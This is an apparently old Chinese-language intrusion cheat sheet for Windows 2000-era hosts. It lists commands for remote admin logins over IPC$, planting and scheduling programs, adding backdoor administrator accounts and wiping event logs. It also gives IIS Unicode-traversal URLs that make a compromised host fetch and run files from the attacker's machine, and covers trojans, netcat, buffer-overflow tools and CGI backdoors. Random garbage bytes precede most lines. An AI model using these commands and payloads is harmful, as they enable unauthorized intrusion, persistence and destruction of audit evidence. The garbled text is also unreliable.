网管和黑客都必须知道的命令
�M"*NV(".g 常用的几条NET命令:
hT�a X@=Ra ?=l�b@�U (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
@�PM�<pEve b�I�m4��s� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
+mjwX��?yF ��}"+"nf5h (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
UG�\�2w�H_ T[4x�t,�[a (查看远程主机时间) net time \\IP地址
�� +C\79,r Rir�0^�XqG (定时启动某个程序) at \\IP地址 02:18 readme.exe
"]j��N'N(. ���-aBhN~� (查看共享) net view \\IP地址
�r�)~�?5d� O�Gcdv{�,P (查看netbios工作组列表) nbtstat -A IP地址
;�40Z�/#FI rOOo42Y�W` (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
m?�w�Qk:Y1 ItLR�|�LO9 (这两条把自己增加到管理员组): net user 用户名 密码 /add
qJF'KHyU{l ,m*�HR�U�Y net localgroup Administrators 用户名 /add
gZ&4b'X�S, I;}�U/'RR> (断开连接) net use \\IP地址\ipc$ /delete
uP��l7u�1c a�5V�lf�x� 扫尾:
r1F5'?NZ(0 ^/Hf$tYI!` del C:\winnt\system32\logfiles\*.*
@5&5�7R3�> .�@�x.��
� del C:\winnt\ssytem32\config\*.evt
2�Bi�]t%<{ E
u�O:}[�� del C:\winnt\system32\dtclog\*.*
^XeJZkL�EB �]�� K&ca� del C:\winnt\system32\*.log
,Gy,bc�v�{ N�@_�y<7#C del C:\winnt\system32\*.txt
Zz (qc5o,F xj33g6S��� del C:\winnt\*.txt
�#�&uaj��o �R6X2d\l�# del C:\winnt\*.log
�8��Y��%�� S7J.(;
82� 一、netsvc.exe
/Q� W^�v;^ ?r��=`K�l 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
Q65�M(x+oy gL��SI��?� netsvc /list \\IP地址
O<�wH�+�k[ #k�<�l�5x` netsvc schedule \\IP地址 /query
o1� 27? ^� Jv
�5�l �� netsvc \\IP地址 schedule /start
[j�N�Vk�3� ?�0u"No52m 二、OpenTelnet.exe
��E_�30)"] $�Vp&7OC�] 远程启动主机的Telnet服务,并绑定端口到7878,例如:
<�ND�V� 5P Z
�
� OAg7 OpenTelnet \\IP地址 用户名 密码 1 7878
�#2\M(�5�d � W;yg{y � 然后就可以telnet到主机的7878端口,进入DOS方式下:
6(\-aH'�Ol *k�f%?��T. telnet IP地址 7878
>��g+Y//Z �I�_Z?'M 三、winshell.exe
k^JgCC�+�� ��R�K�MF?: 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
h�`Ej�>O7m ?l��[#d7IB p Path (查看winshell主程序的路径信息)
SAN��b�g&$ ;=%cA�#}_0 b reBoot (重新启动机器)
{a>J�QW5= $h8?7:z;um d shutDown (关闭机器)
�Ac*��)z#H �"Aq�L�R�� s Shell (执行后你就会看到可爱的“C:\>”)
W��7����s .2P3� !KCL x eXit (退出本次登录会话,此命令并不终止winshell的运行)
f[��`&�3�+ -h�F!_)�;{ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
O� d6'bO;G �w�e}5'bS> 四、3389登陆器,GUI方式登录远程主机的
B}�y#�AVSA &�H�,UWtU+ 五、elsave.exe
d]_].D�$�� lZ"C~B}9:I 事件日志清除工具
V#4o�x�km� p&xj7qwp@F elsave -s \\IP地址 -l "application" -C
bl��G?("0! vPZ0?r�_5W elsave -s \\IP地址 -l "system" -C
b
V_<5�PHP 0|hOoO]?q& elsave -s \\IP地址 -l "security" -C
otdv;xI�9� �SoC�N.J30 执行后成功清除应用程序日志,系统日志,安全日志
Vw.�4�;Zy( �is�npSN"z 六、hbulot.exe
O#^qd0e'P! 8BY`~TZO$q 开启win2kserver和winxp的3389服务
������FD�8 s�u�60j^e* hbulot [/r]
:-2��sKD y ,F'y��:px 使用/r表示安装完成后自动重起目标使设置生效。
][\ �u�H�| �.(Z^��[C} 七、nc.exe(netcat.exe)
4&L,QSJ V� 8���M[�'- 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�����pX�NH ����zyK11 想要连接到某处: nc [-options] hostname port[s] [ports] ...
H!���y-o'Z v��MXn#eR 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�#LYx;[�D6 3�=Xvl 58k 参数:
.D=#HEs�hk �N�w��1 .x -e prog 程序重定向,一旦连接,就执行 [危险!!]
e�7�Sg-NWV ��l���i`�� -g gateway source-routing hop point[s], up to 8
�WK� SWOSJ #�KL��W&A� -G num source-routing pointer: 4, 8, 12, ...
!?�B�2�O�E Nc��(A5�*� -h 帮助信息
4�
$�)}d�� _2})URU<�S -i secs 延时的间隔
�"�W}+~Sn� ��!�uK�uO� -l 监听模式,用于入站连接
-,"e�N}P^ U`4t�4CHA� -n 指定数字的IP地址,不能用hostname
�.6i �+_B| @^K����w\s -o file 记录16进制的传输
- :x6X$=� ��mndNkK5o -p port 本地端口号
(�>o�m.�FM B��/E�GaYH -r 任意指定本地及远程端口
i+Xb�3+�R *�^%ohCU�i -s addr 本地源地址
�AIw�p2�Fz pWGIA6&v�( -u UDP模式
( 2��KopL� 0mT.J~}1�v -v 详细输出——用两个-v可得到更详细的内容
e5�sQ�l1� � �%�B�#�8 -w secs timeout的时间
h�T�AZGV�( @�%As>X<3t -z 将输入输出关掉——用于扫描时
p:4oA��<�V 八、TFTPD32.EXE
wIQt
f|ZI> 4�Cf�.%f9@ 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�
�[�"�Jt2 _ Av_�jw`m http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�VSm{�]Z!x yL�v�U@V@~ 然后可以直接令文件运行:
w�5Y�t mnP vQ
Dl�S�1L http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
#Ic-?2Gn4< �k`��,>52 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
;[j)g�,�7{ k Rp�$[^ma 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
Dn.%+im-u� .u��9,�w�� 一、一 Xscan命令行运行参数说明:
�E�YK�V�}` �k!wEP�i�] 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
+�C[%^�G-: �y�gT�c�
Y 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�RZ:=�';�� DqBiB�H[%h xscan -file <主机列表文件名> <检测项目> [其他选项]
�nTPq|=�C� 8}!W�J�2[R 其中<检测项目> 含义如下:
.|3&��lb6� ���n��]P,5 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
*Ag�,/C�m] f�nU;DS]�W -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
-f8iq��[F5 �
i(n BXV{ -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Qet�yu�hS~ r1�[Jo|4vo -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
7,Q>>%�/0P �r/mKuGa]� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
p6W|4_a?�� �nHF%PH#|o [其他选项] 含义如下:
�77p8|6��3 4�xD`��Z_U -v: 显示详细扫描进度
GC^�>�o��F 8{4jlL;"`? -p: 跳过Ping不通的主机
�5X,|�P�n �aqN��6.�t -o: 跳过没有检测到开放端口的主机
5}"9)LT@@w A�q��ucP�@ -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
